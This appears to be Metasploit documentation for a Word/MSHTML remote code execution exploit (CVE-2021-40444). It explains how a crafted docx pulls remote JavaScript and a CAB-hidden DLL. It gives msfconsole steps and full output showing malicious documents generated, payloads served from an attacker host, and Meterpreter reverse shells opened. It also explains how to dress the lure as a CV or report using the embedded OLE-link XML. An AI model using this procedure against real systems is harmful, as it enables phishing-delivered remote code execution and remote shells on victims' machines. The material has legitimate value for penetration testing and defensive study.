CVE-2021-40444 is a vulnerability within the MSHTML feature of the Windows operating system that relies on the old Internet Explorer engine.  It is triggered by a specially-crafted docx file, so while Word is required for exploitation, the vulnerability itself exists in the Windows Operating System.
The specially-crafted docx file contains a reference to an html file containing JavaScript that points
to a separately-hosted CAB file.  When Word opens the document, it launches the IE preview feature which
resolves the linked html and opens the CAB file containing an inf file.  Then, because of a zip slip
vulnerability, the inf (actually a dll payload) file is stored locally and set to be opened by the control
panel (cpl).  The result is a side-loaded dll payload on the system running as the user who opened the document.

## Vulnerable Application

The malicious document exploiting CVE-2021-40444 loads remote HTML code with active JavaScript.

The attacking code dynamically creates a new HTMLFile ActiveX object in-memory and injects into it JavaScript code that
loads an HTML ActiveX installation object. The new object downloads a remote compressed .cab archive.

The cab archive hide  a file which is supposed to describe the object’s installation parameters, but in this case is
used to disguise the DLL payload.

### Make your lab

You need official version of Microsoft Office installed (using a valid licence). And stay unpatched for this.

The exploitation don't work on unlicensed version.

Tested on Microsoft Windows 10 1909 w/ Microsoft Office Word 2016.

## Verification Steps

1. Start `msfconsole`
2. `use exploit/windows/fileformat/word_mshtml_rce`
3. `set SRVHOST [IP]`
4. `set LHOST [IP]`
5. `run`

## Options
### OBFUSCATE

Obfuscate JavaScript content. Default: true

### DocxTemplate
*This is an advanced option.*

A DOCX file that will be used as a template to build the exploit.

## Targets
* `Hosted`: Prepares the docx file and CAB file, then launches an http server to
  serve the CAB file and deliver the payload.

## Scenarios

### Basic use

1. Generate the exploit as following.

    ```
    msf exploit(windows/fileformat/word_mshtml_rce) > use exploit/windows/fileformat/word_mshtml_rce
    [*] Using configured payload windows/x64/meterpreter/reverse_tcp
    msf exploit(windows/fileformat/word_mshtml_rce) > set SRVHOST 172.20.7.36
    SRVHOST => 172.20.7.36
    msf exploit(windows/fileformat/word_mshtml_rce) > set LHOST 172.20.7.36
    LHOST => 172.20.7.36
    msf exploit(windows/fileformat/word_mshtml_rce) > set VERBOSE true
    VERBOSE => true
    msf exploit(windows/fileformat/word_mshtml_rce) > run
    [*] Using URL: http://172.20.7.36:8080/x58G8ZxLbZ
    [*] Server started.
    [*] CVE-2021-40444: Generate a malicious docx file
    [*] Using template '/opt/metasploit/data/exploits/cve-2021-40444.docx'
    [*] Parsing item from template: [Content_Types].xml
    [*] Parsing item from template: _rels/
    [*] Parsing item from template: _rels/.rels
    [*] Parsing item from template: docProps/
    [*] Parsing item from template: docProps/core.xml
    [*] Parsing item from template: docProps/app.xml
    [*] Parsing item from template: word/
    [*] Parsing item from template: word/theme/
    [*] Parsing item from template: word/theme/theme1.xml
    [*] Parsing item from template: word/styles.xml
    [*] Parsing item from template: word/settings.xml
    [*] Parsing item from template: word/document.xml
    [*] Parsing item from template: word/_rels/
    [*] Parsing item from template: word/_rels/document.xml.rels
    [*] Parsing item from template: word/fontTable.xml
    [*] Parsing item from template: word/webSettings.xml
    [*] Injecting payload in docx document
    [*] Finalizing docx 'msf.docx'
    [+] msf.docx stored at /home/mekhalleh/.msf4/local/msf.docx
    ```

2. Execute the DOCX document on a remote vulnerable system.

    ```
    [*] 172.20.7.36      word_mshtml_rce - Sending HTML Payload
    [*] 172.20.7.36      word_mshtml_rce - Obfuscate JavaScript content
    [*] 172.20.7.36      word_mshtml_rce - Sending HTML Payload
    [*] 172.20.7.36      word_mshtml_rce - Obfuscate JavaScript content
    [*] 172.20.7.36      word_mshtml_rce - Sending HTML Payload
    [*] 172.20.7.36      word_mshtml_rce - Obfuscate JavaScript content
    [*] 172.20.7.36      word_mshtml_rce - Sending CAB Payload
    [*] 172.20.7.36      word_mshtml_rce - Data block added w/ checksum: cc1d5e18
    [*] 172.20.7.36      word_mshtml_rce - Data block added w/ checksum: 7e6fb805
    [*] 172.20.7.36      word_mshtml_rce - Sending CAB Payload
    [*] 172.20.7.36      word_mshtml_rce - Data block added w/ checksum: 620a35dd
    [*] 172.20.7.36      word_mshtml_rce - Data block added w/ checksum: 7e6fb805
    [*] Sending stage (200262 bytes) to 172.20.7.36
    [*] Meterpreter session 1 opened (172.20.7.36:4444 -> 172.20.7.36:57920) at 2021-11-05 16:41:13 +0400
    ```

### Using custom template

1. Generate a custom DOCX template

    You need to create new office document and personalizing it by your own model (CV, Report, ...).
    
    The easy way, copy and paste (keep formatting) from `data/exploits/cve-2021-40444.docx`.
    
    You can copy this anywhere in the document.
    
    Save the document and unpack this.
    
    Check that `word/document.xml` contains something like:
    
    ```
    &lt;w:object w:dxaOrig=&quot;4320&quot; w:dyaOrig=&quot;4320&quot;&gt;
      &lt;v:shapetype id=&quot;_x0000_t75&quot; coordsize=&quot;21600,21600&quot; o:spt=&quot;75&quot; o:preferrelative=&quot;t&quot; path=&quot;m@4@5l@4@11@9@11@9@5xe&quot; filled=&quot;f&quot; stroked=&quot;f&quot;&gt;
        &lt;v:stroke joinstyle=&quot;miter&quot;/&gt;
        &lt;v:formulas&gt;
          &lt;v:f eqn=&quot;if lineDrawn pixelLineWidth 0&quot;/&gt;
          &lt;v:f eqn=&quot;sum @0 1 0&quot;/&gt;
          &lt;v:f eqn=&quot;sum 0 0 @1&quot;/&gt;
          &lt;v:f eqn=&quot;prod @2 1 2&quot;/&gt;
          &lt;v:f eqn=&quot;prod @3 21600 pixelWidth&quot;/&gt;
          &lt;v:f eqn=&quot;prod @3 21600 pixelHeight&quot;/&gt;
          &lt;v:f eqn=&quot;sum @0 0 1&quot;/&gt;
          &lt;v:f eqn=&quot;prod @6 1 2&quot;/&gt;
          &lt;v:f eqn=&quot;prod @7 21600 pixelWidth&quot;/&gt;
          &lt;v:f eqn=&quot;sum @8 21600 0&quot;/&gt;
          &lt;v:f eqn=&quot;prod @7 21600 pixelHeight&quot;/&gt;
          &lt;v:f eqn=&quot;sum @10 21600 0&quot;/&gt;
        &lt;/v:formulas&gt;
        &lt;v:path o:extrusionok=&quot;f&quot; gradientshapeok=&quot;t&quot; o:connecttype=&quot;rect&quot;/&gt;
        &lt;o:lock v:ext=&quot;edit&quot; aspectratio=&quot;t&quot;/&gt;
      &lt;/v:shapetype&gt;
      &lt;v:shape id=&quot;_x0000_i1025&quot; type=&quot;#_x0000_t75&quot; style=&quot;width:3.75pt;height:3.75pt&quot; o:ole=&quot;&quot;&gt;
        &lt;v:imagedata r:id=&quot;rId4&quot; o:title=&quot;&quot; cropbottom=&quot;64444f&quot; cropright=&quot;64444f&quot;/&gt;
      &lt;/v:shape&gt;
      &lt;o:OLEObject Type=&quot;Link&quot; ProgID=&quot;TARGET_HERE&quot; ShapeID=&quot;_x0000_i1025&quot; DrawAspect=&quot;Content&quot; r:id=&quot;rId5&quot; UpdateMode=&quot;OnCall&quot;&gt;
        &lt;o:LinkType&gt;EnhancedMetaFile&lt;/o:LinkType&gt;
        &lt;o:LockedField&gt;false&lt;/o:LockedField&gt;
        &lt;o:FieldCodes&gt;\f 0&lt;/o:FieldCodes&gt;
      &lt;/o:OLEObject&gt;
    &lt;/w:object&gt;
    ```
    
    Check that `word/_rels/document.xml.rels` have good relation to the above thing:
    
    ```
    &lt;Relationship Id=&quot;rId32&quot; Type=&quot;http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject&quot; Target=&quot;TARGET_HERE&quot; TargetMode=&quot;External&quot;/&gt;
    &lt;Relationship Id=&quot;rId31&quot; Type=&quot;http://schemas.openxmlformats.org/officeDocument/2006/relationships/image&quot; Target=&quot;NULL&quot; TargetMode=&quot;External&quot;/&gt;
    ```
    
    Pack that to create word document to used as template.

2. Use the template with `msfconsole`.

    ```
    msf exploit(windows/fileformat/word_mshtml_rce) > use exploit/windows/fileformat/word_mshtml_rce
    [*] Using configured payload windows/x64/meterpreter/reverse_tcp
    msf exploit(windows/fileformat/word_mshtml_rce) > set customtemplate /tmp/readme.docx
    customtemplate => /tmp/readme.docx
    msf exploit(windows/fileformat/word_mshtml_rce) > set srvhost 172.20.7.36
    srvhost => 172.20.7.36
    msf exploit(windows/fileformat/word_mshtml_rce) > set lhost 172.20.7.36
    lhost => 172.20.7.36
    msf exploit(windows/fileformat/word_mshtml_rce) > set verbose true
    verbose => true
    msf exploit(windows/fileformat/word_mshtml_rce) > run
    [*] Using URL: http://172.20.7.36:8080/c6RhuAJ0fcW7
    [*] Server started.
    [*] CVE-2021-40444: Generate a malicious docx file
    [*] Using template '/tmp/readme.docx'
    [*] Parsing item from template: [Content_Types].xml
    [*] Parsing item from template: _rels/
    [*] Parsing item from template: _rels/.rels
    [*] Parsing item from template: docProps/
    [*] Parsing item from template: docProps/core.xml
    [*] Parsing item from template: docProps/app.xml
    [*] Parsing item from template: word/
    [*] Parsing item from template: word/theme/
    [*] Parsing item from template: word/theme/theme1.xml
    [*] Parsing item from template: word/styles.xml
    [*] Parsing item from template: word/settings.xml
    [*] Parsing item from template: word/endnotes.xml
    [*] Parsing item from template: word/footnotes.xml
    [*] Parsing item from template: word/document.xml
    [*] Parsing item from template: word/media/
    [*] Parsing item from template: word/media/image11.jpg
    [*] Parsing item from template: word/media/image17.jpg
    [*] Parsing item from template: word/media/image4.png
    [*] Parsing item from template: word/media/image18.jpg
    [*] Parsing item from template: word/media/image10.jpg
    [*] Parsing item from template: word/media/image15.jpg
    [*] Parsing item from template: word/media/image19.jpg
    [*] Parsing item from template: word/media/image3.jpg
    [*] Parsing item from template: word/media/image7.jpg
    [*] Parsing item from template: word/media/image14.png
    [*] Parsing item from template: word/media/image1.png
    [*] Parsing item from template: word/media/image8.jpg
    [*] Parsing item from template: word/media/image9.jpg
    [*] Parsing item from template: word/media/image16.jpg
    [*] Parsing item from template: word/media/image12.jpg
    [*] Parsing item from template: word/media/image13.jpg
    [*] Parsing item from template: word/media/image2.png
    [*] Parsing item from template: word/media/image5.png
    [*] Parsing item from template: word/media/image6.jpg
    [*] Parsing item from template: word/_rels/
    [*] Parsing item from template: word/_rels/settings.xml.rels
    [*] Parsing item from template: word/_rels/document.xml.rels
    [*] Parsing item from template: word/fontTable.xml
    [*] Parsing item from template: word/webSettings.xml
    [*] Parsing item from template: word/numbering.xml
    [*] Injecting payload in docx document
    [*] Finalizing docx 'msf.docx'
    [+] msf.docx stored at /home/mekhalleh/.msf4/local/msf.docx
    ```

3. Execute the DOCX document on a remote vulnerable system.

    ```
    [*] 172.20.7.36      word_mshtml_rce - Sending HTML Payload
    [*] 172.20.7.36      word_mshtml_rce - Obfuscate JavaScript content
    [*] 172.20.7.36      word_mshtml_rce - Sending HTML Payload
    [*] 172.20.7.36      word_mshtml_rce - Obfuscate JavaScript content
    [*] 172.20.7.36      word_mshtml_rce - Sending HTML Payload
    [*] 172.20.7.36      word_mshtml_rce - Obfuscate JavaScript content
    [*] 172.20.7.36      word_mshtml_rce - Sending CAB Payload
    [*] 172.20.7.36      word_mshtml_rce - Data block added w/ checksum: f3189fad
    [*] 172.20.7.36      word_mshtml_rce - Data block added w/ checksum: 7e6fb805
    [*] 172.20.7.36      word_mshtml_rce - Sending CAB Payload
    [*] 172.20.7.36      word_mshtml_rce - Data block added w/ checksum: 3b8886e6
    [*] 172.20.7.36      word_mshtml_rce - Data block added w/ checksum: 7e6fb805
    [*] Sending stage (200262 bytes) to 172.20.7.36
    [*] Meterpreter session 1 opened (172.20.7.36:4444 -> 172.20.7.36:59004) at 2021-11-08 19:51:01 +0400
    ```

## References

1. <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>
2. <https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/>
3. <http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf>
4. <https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md>
5. <https://github.com/klezVirus/CVE-2021-40444>
